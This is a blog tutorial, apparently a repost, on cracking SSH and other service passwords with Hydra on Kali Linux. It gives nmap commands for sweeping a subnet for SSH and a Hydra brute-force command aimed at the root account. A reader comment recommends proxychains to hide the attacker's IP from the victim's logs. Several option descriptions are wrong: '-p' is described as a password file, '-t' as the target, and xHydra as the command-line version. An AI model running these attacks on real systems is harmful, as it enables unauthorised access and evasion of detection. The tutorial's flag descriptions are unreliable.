Breaking SSH, VNC, and other passwords with Kali Linux and Hydra

My buddy Aamir Lakhani aka drchaos wrote a great post on breaking SSH, VNC and other services. The original post can be found HERE.

Hydra is a very fast and effective network login cracker. It will help you perform brute force attacks against SSH servers, VNC, and other services. When you launch Hydra it will launch the GUI in Kali, however in this tutorial we will use xHydra, which is the command line version of the tool. The command line version of the tool gives you much for flexibility in how to use the tool.

Wordlists

This attack requires a wordlist. You can locate the default wordlist. This demo works well with the rockyou word list located at /usr/share/wordlists/rockyou.txt.gz in Kali. You will need to extract it first before using it. You can also use Aamir Lakhani’s Dr. Chaos guide to creating your wordlists with this tutorialhttp://www.drchaos.com/creating-custom-dictionary-files-using-cewl/ or simply download a pretty decent custom created wordlist here: http://www.drchaos.com/public_files/chaos-dictionary.lst.txt

Scanning for SSH Servers using NMAP

The first thing we will do is scan for SSH services listening on port 22. We are going to scan for the entire 10.1.100/24 subnet, but we could also scan for single host or a range.

Here’s a simple example that will scan all computers on the subnet and report any devices listening on port 22. . All of this along with the version of SSH that the server is running is output to a text file ssh_hosts:

nmap –p 22 –open –sV 10.1.100.0/24 > ssh_hosts

We could have also scanned it this way

nmap -p22 –open -PN -sV -oG ssh_hosts 10.1.100.0/24

Or another way, this presents a list if IPs that have SSH up:

nmap -p 22 10.44.46.0/27|awk ‘/scan report for/ {print $0}’|grep -Eo ‘[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}’

Next I am going to use Hydra. Hydra is very well-known and respected network log on cracker which can support many different services. (Similar projects and tools include medusa and John The Ripper).

Hydra is able to use external files for passwords, usernames, or username and password combinations. Hydra can be used to brute-force the following services:

As a password/ log on cracker (hacking tool) – Hydra has been tested on the following protocols:

afp cisco cisco-enable cvs
firebird ftp http-get http-head
http-proxy https-get https-head https-form-get
https-form-post icq imap imap-ntlm
ldap2 ldap3 mssql mysql
ncp nntp oracle-listener pcanywhere
pcnfs pop3 pop3-ntlm postgres
rexec rlogin rsh sapr3
sip smb smbnt smtp-auth
smtp-auth-ntlm snmp socks5 ssh2
teamspeak telnet vmauthd vnc

We are going to enter the command

hydra –s 22 –v –l root –p /root/password.txt –t 10 192.168.0.128 ssh

The options in Hydra are very straightforward:

-s is the destination port

-v verbose logging

-l telling Hydra you will provide a static login (you can use a file for multiple usernames instead).

-p password file

-t target, The IP address of host name of the target

ssh – you can specify the protocol being used.

Special thanks to editor-in-chief Keith Rayle

One thought on “Breaking SSH, VNC, and other passwords with Kali Linux and Hydra”

  1. This is great, however all a victim needs to do is check the auth.log to see your IP and therefore your location.

    Running this behind a proxychain/HYDRA_PROXY is far better – you should have covered it

Leave a Reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.